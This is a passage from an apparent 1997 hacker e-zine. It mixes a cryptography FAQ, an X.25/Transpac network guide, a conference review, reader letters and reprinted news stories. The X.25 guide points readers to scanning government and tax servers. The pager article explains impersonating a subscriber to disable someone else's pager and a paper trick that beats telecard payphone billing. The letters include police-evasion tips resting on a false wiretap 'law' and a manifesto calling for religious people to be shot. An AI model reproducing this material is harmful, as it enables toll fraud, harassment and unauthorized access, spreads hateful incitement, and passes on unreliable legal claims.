key length the longer the time needed for encryption. Encryption over a LAN
environment should not be a bottleneck in the communications.
7) What is RSA?
RSA is the industry standard for public key cryptography. Its algorithm is
based on the difficulty of factoring large numbers. Encryption is performed
'one-way', indicating that f(x) is the encryption function but f-1(x) is very
hard to compute.
8) What is DES?
Data Encryption Standard (DES) is the standard for private key encryption and
is recognized by international standards organizations such as ANSI and ISO.
Standard encryption schemes are needed to ensure interoperability of systems
for the same reasons standards are needed for all network applications. The
most important criteria for a standard (and in fact any) cryptographic scheme
is that the security must rely on the key and not in the secrecy of the
algorithm. By the definition of encryption, simply deducing the algorithm
should not make it any easier to decrypt messages.
DES uses the same key for encrypting as decrypting. This encryption is not
based on the difficulty of factoring large numbers but is based on a set of
non-linear transformations. The key can be any 56-bit number and there are
few weak keys. A good example of a weak key is one that is all 0's or 1's.
This encryption is not based on the difficulty of factoring large numbers but
is based on a set of non-linear transformations. DES is a single combination
of operations, substitution followed by permutation, performed on the message
based on the key and on a set of constant values (the algorithm). This
function is repetitive and so can be easily implemented using hardware,
making it a very fast solution for encryption.
9) What is a Substitution?
A substitution is quite easy to understand. Letters of the alphabet can be
randomly substituted for other letters according to a key as follows:
a b c d e f g...
q s l b z e r...
This substitution key is held by both the person coding the message and the
person decoding the message. The key is simply the substitution of the number
of letters in the alphabet (and could include the space-value). Therefore the
number of permutations is simply 26!. A very large number which could not be
analyzed by brute force. However, this simple type of encryption can easily
be analyzed using other methods.
10) What is a Permutation?
A permutation does not involve changing the values of the plaintext. A
permutation alters their position but leaves the character values unchanged.
The method is performed mathematically using a permutation matrix in which
each row contains only one '1' for the row of size 'm'. The best way to
illustrate this is through a simple alphabetic example:
We will use the following key (m=4)Value: 1 2 3 4 Key: 3 4 1 2 to encrypt the
following: howareyou.
First arrange in groups: howa|reyo|u
Perform the permutation: wahoyoreu
Decrypt with the inverse key.
DES functions by first dividing the initial text (bitstring) of length 64
bits, into two halves (32 bits). The 32 bit string is expanded to 48 bits. An
initial permutation is performed on the bitstring according to a function
derived from the encryption key. The DES algorithm then performs a set of
constant substitution functions using 8 S-boxes followed by the permutation
(An S-box is the term for a 4x16 matrix which is used to perform the
substitution on the bitstring of length, 48 bits). This is followed by a
round of key-based encryption using 48 of the 56 bits in the key. The whole
set of functions is repeated 16 times.
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ The X.25 goods - by memor ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
1. What is X.25 ?#
##################
Different Network, really far for links use that protocol and equipment
named X.25, lots of networks like Transpac, Datapac, Tymnet use that X.25
Protocol.. It uses a hardware named PAD X.25
(Packet Assembler/Dissassembler). Users are connecting to those PADs from a
phone number with a or from a tcp/ip gateway from Internet, or from
another ways.. and from those PADs, they connects the X.25 servers with
the command connect (c), you can also configure a lot of parameters for your
connection (when you'll lost the connection, parameters will be defaults
again.) with the commands full or half (full duplex, half duplex), the
command set for the PAD parameters, the command par? is for displaying the
PAD parameters, stat displays your port address on the PAD. for
disconnecting, here is the command bye or disconnect.. with that hardware,
when connecting it, setting a right user ID, (if you can connect reverse
charging calls host), you must know that any network has a prefix (dnic) for
instance : 02080 is for Transpac in France.. 03110 is for telenet in USA. (of
course, with the USER ID is required a PASSWORD.. that would be so easy ID
xxxxxx is for the user id, and it will ask for a password after.)
2. here are the prefixs of some networks you can connect o with an x.25 pad:#
#############################################################################
02080 is Transpac / France
02342 is PSS / England
02405 is Telepak / Sweden
02624 is Datex-P / Germany
03106 is Tymnet / USA
03110 is Telenet / USA
04251 is Isranet / Israel
05252 is Telepac / Singapore
. Talking about Transpac / France (02080) :#
############################################
Transpac is the X.25 French network that anyone can use to connect to a
PAD in france with the numbers 3617 3615(those are expensive to call) 3614 or
3613 (less expensive ones),...with those different numbers, you can connect
to different services.. the most interesting services are on the expensive
numbers and the government/companies ones with passwords and logins are on
the less expensive ones. those hosts have an x.25 address and a nabx25.
. What is a nab X.25?#
######################
a NABX25 in french mean Nom Abrégé X.25, in american language, i will
call it an X.25 Abriged NAME, that means for each nua (x25 adress), you have
a name that u type it on those services to connect to it quickly without
having to remember its nua (anyways, french dont know nabx25 is for,
they can connect to the hosts with the nua)
example : for nabx25 TEASER (french server of Upload / Download in 1200
Bauds), has the nua of 0208078270373.
On the minitel keyboard (Terminal + Modem to call those 361x numbers, you
can directly type the nua, replacing the 02080 by 1 (1 is france) so it
would be 178270373 )
. What is minitel and Videotex ?#
#################################
"Minitel" is the name of that 'modem and terminal' integrated for
connecting Videotex phone numbers like 3617, 3616, 3615, 3614, 3613,
3606xxxx, 3605xxxx ... it is sold and rented by France Telecom in their
agencies but can be easily replaced by an US Robotics sportster, by setting
on the V.23 modulation (1200/75 bauds) changing the register S34 to 8 with
ATs34=8&w (&w for saving the new settings.) or by a V.23 modulation modem
called CAP.23, not expensive at all..
Videotex is a Graphism Virtual Terminal.. not ansi like the VT, but
Videotex, with a lot of graphics functions i explained in some thtj issues,
before.. you can anyways download one of those videotex terminals..
for modems connecting, they are named olicom, minitel.. (www.yahoo.com,
search to minitel/videotex)
for telnet connecting (to those tcp/ip minitels), they are on
http://www.minitel.fr or on www.mctel.fr (VTX plug is the name of that
program for win95/3.11)
For Linux, Videotex terminals exist to save videotex pages and for
connecting via modem or telnet (check www.yahoo.com here too..)
3. Some Telnet servers to connect for accessing Transpac nabx25 or nua :#
#########################################################################
first, you can connect free that MGS nab25 server, which permit you to
search (like yahoo) any nabx25 server for the domain you want, by connecting
on port 25 on www.minitel.fr , with the login minitel.. If you want more
services, with access to a x25 pad, you need to have that damn credit card..
or to hack some ID and PASSWD, the security of that server is hum.. not too
bad, it got totally hacked one time before if i remember, but now it seems
pretty secure, logs are checked by france telecom guys every days and the
(new?) root seems to be more intelligent. that "videotex" site can allow you
to work on it with ansi, so your telnet client will work on it.
Secondly, strictly videotex, you can connect with VTX-PLUG to
www.mctel.fr , to those X.25 PADS, first, FREE you can connect the services
MGS and 3611 (MGS is that search engine for any nabx25 server and 3611 is a
search engine for any info of any guy in France) (VTX-PLUG connect on port
516 of www.mctel.fr) or connect services 361x with an ID and PASSWD..
With you damn modem, you can also connect to the 361x services from
foreign country with a modem videotex terminal (or minitel) to +33 8 36 43 15
15 for 3615 service, +33 8 36 43 14 14 for 3613 service, or +33 8 36 43 13 13
for 3613 service. You can connect a good old x.25 pad by calling +33 8 36 06
44 44 (Transpac one) , for connecting to that old compuserves, can be called
those ones too +33 8 36 06 96 96 (9600 bauds) or +33 8 36 06 24 24 (2400
bauds one) .
4. How do we connect servers.. method ?#
########################################
We connect servers with that first number of the nua (1 for france.. the
others numbers from a 361x service are forbidden.. only connect Transpac or
Gateways) 1 is France(or 02080 if you connects it from a telenet or another
network)
after that, we put the 2 numbers of the departement where is located the
server.. (a departement is like a state in the US.)
. Here is the France Departements list:#
########################################
#####
01 # ain
02 # aisne
03 # allier
04 # alpes hautes provence
05 # hautes alpes
06 # alpes maritimes
07 # ardeche
08 # ardennes
09 # ariege
10 # aube
11 # aude
12 # aveyron
13 # bouches du rhones
14 # calvados
15 # cantal
16 # charente
17 # charente-maritime
18 # cher
19 # correze
20 # corse
21 # cote d'or
22 # cote d'armor
23 # creuse
24 # dordogne
25 # doubs
26 # drome
27 # eure
28 # eure et loir
29 # finistere
30 # gard
31 # haute garonne
32 # gers
33 # gironde
34 # herault
35 # ille et vilaine
36 # indre
37 # indre et loire
38 # isere
39 # jura
40 # landes
41 # loir et cher
42 # loire
43 # haute loire
44 # loire atlantique
45 # loiret
46 # lot
47 # lot et garronne
48 # lozere
49 # maine et loire
50 # manche
51 # marne
52 # haute marne
53 # mayenne
54 # meurthe et moselle
55 # meuse
56 # morbihan
57 # moselle
58 # nievre
59 # nord
60 # oise
61 # orne
62 # pas de calais
63 # puy de dome
64 # pyrenees atlantiques
65 # hautes pyrenees
67 # bas rhin
68 # haut rhin
69 # rhone
70 # haute saone
71 # saone et loire
72 # sarthe
73 # savoie
74 # haute savoie
75 # paris
76 # seine maritime
77 # seine et marne
78 # yvelines
79 # deux sevres
80 # somme
81 # tarn
82 # tarn et garonne
83 # var
84 # vaucluse
85 # vendée
86 # vienne
87 # haute vienne
88 # vosges
89 # yonne
90 # territoire de belfort
91 # essonne
92 # hauts de seine
93 # seine satin denis
94 # val de marne
95 # val d'oise
#####
After that, the next 6 numbers are the servers numbers.. mostly if you scan,
you will find servers on 060xxx 021xxx 270xxx 118xxx 190xxx 001xxx 911xxx
201xxx 010xxx 160xxx, but well remember that you can find servers on any
xxx000 to xxx999.
For instance, if you need to know the amora x.25 server adress, try to scan
121xxxxxx (1 is france , 21 is cote d'or, where is located amora company)
if you need to scan for a government or france telecom x.25 server, scan on
175xxxxxx (1 is france and 75 is paris.. where governement is mostly..)
for another Taxes server, try on 167xxxxxx (1 is france and 67 is
Stransbourg, where is a Taxes server.) Do a random scanning, nua scans are
illegal and detected in France.
After those numbers, we can (not needed sometimes) 2 nod numbers for
choosing the service you want to connect in that host.. (on the nabx25, the
nod have a name too which can be another nabx25 for the same host.) like
13506031801 is for connecting the restricted service of a french cops/lame
server.
5. Some nua (0208) for some Transpac Server :#
##############################################
0208078270383 Teaser Server (Download/Upload mostly, Email access)
0208078270363 Teaser Server (gives you back you adress and nod argument)
0208059161009 Some Server
020806700130244 Taxes Server in VT100
. Note :#
#########
Yes, you can connect not only Videotex terminal servers, you can connect
good old vt100-320 , ansi servers, its why it can be interesting for
americans and others to scan it, they could find bank services, telnet
gateways (back to internet), compuserves one (bah..) , ...
020807813014614 Cars Selling Server
020809118070705 Some server
...
. Some NABX25 :#
################
telnet Telnet Gateway
Teaser Teaser Server (Download/Upload mostly, Email access)
Impots Financial Server
CNX Mail Server
CHEZ Mail Server
AKELA Some Server
AAA Some Ladies/Dudes Server
Have fun with that.
memor.
DIAGO Chess Playing server
# memor / hbs # memor@stepahead.net
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Beyond HOPE review - by AlienPhreak ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
As some of you might of heard Beyond Hope was held in the Big Apple a couple
weeks ago. I can personally say it sucked. There were only a few occasions
when I actually enjoyed being there.
I thought there would be much more hacking and phreaking going on but it
ended up with the juarez puppy in everyone coming out to take advantage of
the T1 line Nynex so anonymously supplied. I learned only one thing which was
(I don't know much about cellular) how to scan and listen in on peoples'
cellular calls through a motorola flip phone.
I did enjoy the Bernie S. and Phiber Optik speeches. I'm sure we all know
about Bernie S, he seemed very intelligent but I think he did have illegal
possessions (aka Red Box) and in all honesty boxing is outdated and rather
lame. He certainly wasn't what I'd consider a phone wiz. Still there was no
reason for him to go to five high security prisons serving time with some big
black guy named Bubba. Phiber Optik is someone that I actually admire,
because he knew his shit.
After a while the cDc came on and just ruined everything. What can I say
about Death Veggie? He's fucking stupid! Also Beyond HOPE was sponsored by
2600 *coughselloutcough* So I saw some t-shirts going around and them selling
more of their FREE INFORMATION, but I had to pitch in and buy an "owned"
shirt. I *might* go to the next HOPE if they keep the cDc out of it and have
a decent lineup.
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Tatoo pager info and more - by memor ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
A little way to call Tatoo pagers easily from French payfones
by memor/hbs memor@mygale.org
http://www.mygale.org/00/memor
******************************
!Remember!
----------
Tatoo is a pager made by France Telecom and Motorola available in France.
it is called via the number 0604xxxxxx
or from a foreign country it is +33 604xxxxxx
ATDT 0604xxxxxx,,,,numberyouwantthepersoncall,,,# can be a way from a
modem to call and send a numeric page
With an operator, u can send alphanumeric messages.
With a "manual" way, u use your phone and call
the 0604xxxxxx, you wait for the recorded voice asking in French
to type the number you want to be called at, you type the number
and after it, type # and Hang Up, the message will be sent. The person
will receive it 10 mins after, time for the slow france telecom
relays and computers to transmit the numeric message.
!Here is how to invalidate a Tatoo from an annoying dude
(please keystroke, dont do it on me hehe)!
well, you have to phone that number reserved for tatoos users which
is.. 08 36 60 40 20 (+33 8 36 60 40 20 for foreign countries i guess)
ask the operator with your french voice to,
"je suis le tatoo numero 08 06 xx xx, quelle est ma zone de reception"
you will ask the operator where does the pager receive messages
she will answer a "district" like paris, or south of france, or another
thing.. and tell her after that "je demenage en zone <autre zone>"
you will tell the operator to change the district to another one,
so the pager wont receive message after that.. and the annoying person
wont be contacted again..
now, something about French payfones..
you use a "telecarte" or telecard with fone money utilities..
1 unit = 0.73 ff
its a normal telecard
*******************************
* ***** *
* chip---> * * *
* ***** * -> insert it in the payfone thing...
* *
* some ads here *
*******************************
the payfone works like that with the telecard..
you dial the fone number you want to call
the payfone checks if you called a free fone number or a number you have to
pay for; if its a free fone number, it continues without checking if a card
is in the payfone.
**if its a pay fone number
the payfone will verify that a telecard is in the payfone
if not.. it will disconnect you and beep
if yes:
you connect to the number
<a delay>
the payfones send the signal to kill a unit in the telecard
<a delay>
payfone waits the telecard send the signal that the unit got killed
if signal received.., continue conversation at phone
if signal lost.., disconnect the phone conversation
if signal that telecard is empty.., °see if signal lost
well.. during those delays you have time to put a little paper
between the telecard and the payfone reader/writer like this:
/¯reader/writer of the payfone
---------***\/***----------
-------------------------------------< paper
---------********- <- telecard with *** chip
and so you will have 5 seconds (the delay) to type the number you want the
person to call you back and '#' before the payfone see that there is no card
and hang up on you.. but well that service costs like 1$us for a numeric
message so it can be interesting not having to pay for it :)
memor.
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Help-a-phreak, come to us when you're desperate! ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
The problem is this: a phreak named moloch tried using 800-487-9240 to do an
ani. The number returned a recorded message stating "ARU ID is echo-7-
alpha". Two other messages could also be heard when dialing this number,
"caller interactive is 9900" and "line number is 0". What do these messages
mean? It's the question the telcos can't even answer... after conversations
with Bell Atlantic, Lucent Technologies, AT&T, MCI, and his local telco,
moloch has yet to find the answer he's looking for. He's been told by the
local branches that it's a network code, and the larger telcos say it's a
trunk issue. He's gotten the same messages when attempting an ani from
payphones, regular phones, and on the wm.edu digital phone network. He's
tried special services, network services, hardware services, residential
services, long distance services, general tech support, and trunk support,
but to no avail. Have any of you, the readers, heard any messages like these?
Do you know what these messages mean? If so, let us know, or you can answer
to moloch yourself, at craqhore@multic.ml.org
Help your fellow phreak in his time of need! You'll feel better about
yourself, even if you think you're still a loser!
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Oh No! It's that time again - it's....
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Oddville, THTJ - compiled & edited by Scud-O ³
³ Letters from a place far freakier than LA ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
---
X-Sender: f0k
X-Mailer: Windows Eudora Light Version 3.0.1 (32)
Date: Wed, 07 May 1997 22:15:10 -0500
To: sin@hyper-media.net
From: f0k of the Night
Subject: hi
hello everyone. Id be f0k. (no, Im not black, but I felt the need to refer
to myself in third person, using the word 'be') I will list to you some of
my beliefs, so if/when we ever talk, you'll know alittle about me.
1) I feel any and all information should be free.
2) I believe anyone who stands in the way of my gathering of information
is a communist/socialist pig. These types of ppl should be shot on
sight.
3) I dont believe in the devil... or god.
4) I think anyone who believes in god is weak, selfish and inferior
5) I know Im right, always (unless I change my mind, inwhich case...
I get to be right some more =])
6) I believe in Zero Tolerance politics. If you fuck up, you die. If you
cant provide for yourself you die. Let the
weak/uninspired/lazy/retarded/handicaped filter themselves out. It works
for many other species.
7) I believe 2600 to be a Commercial 'wh0re' of sorts.
8) I believe Bill Clinton is imbred, there for inferior geneticly and should
be eliminated. As to avoid Another little Chelsea Clinton
9) I believe if your still reading this, your one sick mother fucker =]
10) I believe I have all the answers and if you follow me you will reach
a higher state of awareness and enlightment. I also charge 20 bux an hour
for group therapy.
11) I think Jews, Christians, and all other ppl "of faith" should be
coralled up in a cage and shot. You are weak. Your religions are all
relics. You
are the enemy to the Technological Era. Im an equal rights discriminator.
I dont care what religion you are, unless you are a f0kist and follow
f0kism, you are weak.
pretty pimpy eh? There, thats me in a bottle. Spray it on yerself to
attract all the fellas. Tell your friends and your neighbors. w00h00
-f0k-
.aS$$$$$$$$$$$$$$$$$$$$$$$$$$$$Sa.
$$' , `$P' , `S$ $ $$$
$$ $ $ P $ $ $$$
$$ $ssss$ H $ .s$$$
$$ $ E $ a $$$
$$ $$$$$$ E $ $ $$$
$$s. $$$$$$. R .$s. $ $$$
`Q$$$s$$$$$$$$sssss$$$$$$s$$$$$$P'
[ The f0k manifesto - know it well, roflol ]
---
{Several spelling errors have been corrected in the following email}
Date: Wed, 6 Aug 1997 02:41:05 -0400 (EDT)
X-Sender: phraud@mail.interlog.com
X-Mailer: Windows Eudora Light Version 1.5.4 (16)
To: scud@thtj.com
From: REBEL LOGiC <phraud@interlog.com>
Subject: Article
Greets,
I have an article you might consider worth publishing. Here ya go:
PARANOIA
~~~~~~~~~
By: Rebel Logik
For those of you that are not naturally "paranoid" you have my sympathies.
But, buy reading this file you can improve your caution, senses, and
down-right insecurity.
1. Wear dark clothing: Blues, Blacks etc. etc. Also wear things that hide
your face, hoods, hats etc.
2. Always, always look around you for unwanted types (FEDS, Cops, RCMP, CIA,
NSA) who can usually be pinpointed by wearing a certain type of clothing.
Usually suits, sunglasses, basically just MIB's. These foul beings can
reside anywhere. Your school, your alley, family gatherings (it could easily
be the ones you love most that do you in!", party's and other social places.
3. Always be privy to local escape routes. Such as fireescapes, backdoors
etc. These are handy when encountered with a bust.
4. If you happen to see any law enforcement vechicles or telco vehicles in
your neighborhood cease all illegal activity for a number of days until THEY
are gone.
5. Encrypt your Hard-Drive using some encryption utility. Also, (although
easily cracked) put windows passwords on everything. After a large "project"
burn or destroy excess paper with information.
6. Always Op-Divert, and call from payphones when dialing illegally setup
teleconferences. Be aware that OCI has an ANI!
7. If you think you are being tapped, and cannot be bothered to go to a
payphone: Always talk about bullshit first while discussing an illegal
activity. After 2 or so minutes of talking about lunch, family members,
cars etc. They will be forced to hang up and stop the tap. This is called
the "transmission" law. If after a certain amount of time (2-5 minutes)if
they still cannot hear you discussing anything of illegal nature they are
FORCED by LAW to quit listening in.
8. Stay away from drugs while doing important things or you'll fuck them up!
Drugs are okay if you want to lie on your coach eating pizza. That's all!
Try to IPSPOOF while stoned and the FEDS are at your door 5 minutes later!
9. When beige boxing or doing anything else that's illegal and phone
related: Always do it at night and in a secluded area. I know this sounds
like common sense but some phreaks.......
Well, I hope you enjoyed this file!
And remember.....
"Even paranoids have real enemies"-Delmore Schwartz
Well, there it is. Respons with yer response. err....
Later,
Rebel_Logik
---
From: evilchic@nwlink.com
To: "'sin@hyper-media.net'" <sin@hyper-media.net>
Subject: FW: i want to be a sinner yeah i want to be a sinner
Date: Wed, 6 Aug 1997 13:34:19 -0700
Why the fuck is it that I get all these lame ass emails that make no sense???
Suz
-----Original Message-----
From: b c m [SMTP:sandworm666@juno.com]
Sent: Tuesday, August 05, 1997 12:49 PM
To: webmistress@sinnerz.com
Subject: i want to be a sinner yeah i want to be a sinner
sin sin sin sin sin sin sin sin sin sin sin sin sin sin
i want to sin
sin sin sin sin sin sin sin sin sin sin sin sin sin sin
i am kewl i am, they accepted me into those kool aol lamerz clubz
yeah right i wouldnt join one of those stupid ass things
I HATE MOST AOLERS THEY THINK THEY KNOW EVERYTHING
Trying to TOS my ass well they can fuck themselves with there
stupid ASCII Art or IM bombs well fuck em stupid lame ass pussys
i was doing that shit when i was 9. Yeah they were so fuckin cool.
Stupid asses threating people on AOL when they cant even fuckiin
carry it out. FUCK THEM they want to fuckin attack all the bitches on
AOL
they got to get into AOL setup and fuckin use the nickname that IM's the
whole network and fuckin IM bomb everyone on the network. They want to
use a fuckin virus they got to break into setup and change the interface
arround
when you get art updates they got to switch the art with a virus but they
are stupid.
[ ROFLOL! god do we get some stupid e-mail! ]
---
From: Elit3Cr4sh@aol.com
Date: Thu, 7 Aug 1997 17:21:24 -0400 (EDT)
To: scud@thtj.com
Subject: thtj
is there a print issue of this? if so where can i get it
[ no, but if you send me about 25$ ill print you up a copy.... ]
---
Date: Tue, 12 Aug 1997 03:14:40 -0400
From: SUSAN BURTON <sburton@idt.net>
Reply-To: sburton@idt.net
Organization: POOL DISTRIBUTORS,INC.
X-Mailer: Mozilla 3.01C-IDT-v5 (Win95; U)
To: scud@thtj.com
Subject: CELLULAR ACTIVATION??????????????????????????????
hey do you think you can help me?ive been looking for the equipment or
hardware to activate a cellular from a home pc.now i know its out there
and i know its illegal but i cant find where to order this stuff or how
much it is,do you think you can look in to this for and find where and
how much the hardware is,and if possible can you find me a file on how
to activate cellular phones from a home pc thanks i would really
appreciate it,please right back SHADOW
[ look, i dont have time to do your research. do it yourself! use the
search engines out there, look with your own eyes! ]
---
Date: Wed, 13 Aug 1997 00:59:35 -0500
From: Clint Rogers <tennis@linknet.net>
Reply-To: tennis@linknet.net
X-Mailer: Mozilla 3.0Gold (Win95; I)
To: scud@thtj.com
Subject: suggestion
Beeper and pager hacking im looking into that or phreaking a pager??
Clint
[ memor has covered a bunch of things with pagers before, and what
the fuck do you mean by 'phreaking' a pager? ]
---
rom: Jungle1416@aol.com
Date: Tue, 19 Aug 1997 14:31:47 -0400 (EDT)
To: thtj@thtj.com
Subject: information
Hi I really like your new site, and I was wondering if there are catalogs I
can order because I'm really interested in hacking. Thanks!
[ wtf? if you want hacking info, just search on the internet, there are
no catalogs out there.... ]
---
oh yea, and to the 50 or so people who send me a little message from ICQ
about getting ICQ, look im not getting it, nor am i planing to. Im to busy
as it is to bother with that.
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
--------------
--=[The News]=--
Compiled & edited by KungFuFox
--------------
1 : Hackers pay Apple its due
2 : Hackers Frolic in the Woods
3 : `Spam' foes tie up Usenet
4 : Netly News - HOPE On A Rope
5 : Bell Atlantic-Nynex Merger Gets Final OK
6 : Getting Ready For Internet2
7 : AOL urges its members to protect themselves
"It has always been fun." -Brandon Tartikoff
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Hackers pay Apple its due
August 4, 1997
BY CHRIS NOLAN
Talk Is Cheap
WHEN it comes to Apple, even thieves get sentimental. Some of those who know
the company best -- computer hackers -- are urging one another not to
download free copies of the company's latest operating system, Mac OS 8.
Instead, they say, Apple supporters should pay money for the operating
system. [Is it just me, or is this stupid reporter calling warez kiddies
"computer hackers"? Can't these people tell the fucking difference?]
"I've seen behavior in the pirate community which is alien to say the least,"
writes one "bewildered superuser" in a discussion posted on MacInTouch Reader
Reports, a Web site for Macintosh supporters and users. "As I looked and
looked I found not one (illegal) copy of OS 8 GM available anywhere."
Hackers [there it is again] usually pride themselves on their ability to get
good, new software for free. The faster the hack, the better their ability to
manipulate computer code and get products or information companies are
anxious to protect. So, this sudden outbreak of belated good citizenship is,
well, surprising. It's kind of touching, too.
"I have always fully intended to purchase the new OS even though I could have
it for free just by waiting until we install it at my company and STEAL it
then," another Mac user wrote in mid-July, just as talk of former CEO Gil
Amelio's resignation began. "Apple needs every penny, every sale they can
cobble together right now."
Writes another MacInTouch reader, one who seems to speak with a bit more
hacking authority: "Absolutely NO copies of Mac OS 8.0 Golden Master have
been circulating. This is in contrast to 30-40 sites for download Mac OS
7.6cd image in the past. This is EXTREMELY good for Apple and I do support
this movement by some people in the computer underground that have found a
good conscience." [At least this guy used the term "computer underground"]
©1997 San Jose Mercury News
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Hackers Frolic in the Woods
by Mike Tanner
6:13pm 8.Aug.97.PDT -- One of the first things participants see upon
arriving at HIP 97 - a gathering this weekend of 2,500 members of the
international hacking community at a campground about 30 minutes from
Amsterdam - is a gravestone engraved with Bill Gates' name and the epitaph
"Where do you want to go today?"
"All the hackers just go crazy when they see that," event coordinator Maurice
Wessling says of this goad to the fest's resolutely anti-authoritarian
participants. The marker also serves, however - along with the event's
willfully obscure location - to increase the sense of the site as underground
and removed from the routine world. "We are trying to disconnect people from
their daily whereabouts," Wessling says, "to force them to take a different
approach to reality."
HIP - the name stands for Hacking in Progress, a follow-up of sorts to 1993's
Hacking at the End of the Universe convocation - is a kind of politicized
Burning Man for hackers, tent-cities and all-night parties included. Its
technopaganism is skewed pretty far toward the techno side, though. HIP is a
gathering, says an amused Wessling, where "you'll see these very small
igloo-like tents with 17-inch monitors in them."
And unlike the pointed pointlessness of Burning Man, HIP hopes to address
concrete issues that affect the lives of the participants, such as Internet
censorship, spam, and, of course, cryptography. Spamming may seem off the
subject for a group dedicated to abrogating the rules of the Internet, but
Wessling explains that its proliferation threatens to make the Net unusable,
while measures to prevent it may lead to censorship. "The essence of HIP is
that the technical aspect and the political aspect are two sides of the same
coin," he says.
This is not to say that elements of hacking's criminal background won't be
evident at the gathering. There is a tent of German participants present to
discuss the building of a brute-force DES cracking machine, and a
presentation Saturday by another German group that recently made headlines
for exploiting ActiveX security holes to intercept home-banking software.
Still another demonstration will show how radiation from text on a computer
screen can be picked up by an antenna and then displayed on another machine.
But HIP is mainly about how these techniques, and the laws and technologies
used to address them, will affect the freedom and utility of the online world
- about how the protocols developed and exposed by hackers now, says
Wessling, "will be used against us later."
This direction isn't surprising, considering that HIP administrator Wessling
is a former writer for a grassroots publisher of books on police and
intelligence issues. It's also a reflection of the fact that the hacker class
went from being a bane of the network system to becoming its architects.
Wessling's salary, in fact, is paid by XS4All, a high-profile Dutch ISP
itself founded by a group of former hackers.
Although many hackers have gone corporate, says Wessling, "We still feel the
urge to do crazy things like this."
The event's geographical and psychological disconnection is in stark contrast
to HIP's strikingly powerful electronic connections to the outside world,
which consist of a microwave beam IP connection to the campground and a
glass-fiber network connecting 600 participants' computers and growing.
Organizers have also secured extra transatlantic bandwidth for the event.
Aside from allowing homebound hackers to be involved in the gathering through
audio and video feeds to HIP's Web site, it also allows the fest to be
closely coordinated with the simultaneous Beyond HOPE hackers' conference in
New York. In fact, HIP was officially opened Friday morning via video link
from the HOPE site by 2600 magazine editor Emmanuel Goldstein.
These being hackers, however, all that networking muscle is also being used
for such things as a long-distance switch to turn a red light at each
convention location on and off from across the ocean. On a slightly more
useful front, 10 HIPsters are now working their PCs 24 hours a day building
what was a small text site into the real-time multimedia hub. "If they do
something wrong in the coding," says Wessling, "they instantly get three
emails from all over the world. It's a completely new way of error-checking."
That the connections work at all is impressive. Richard Thieme, a writer and
frequent speaker at hacker conventions, points out that at this year's
version of the venerable DEFCon, organizers were unable to get their T1
connection to work. Though they stake their reputations on their ability to
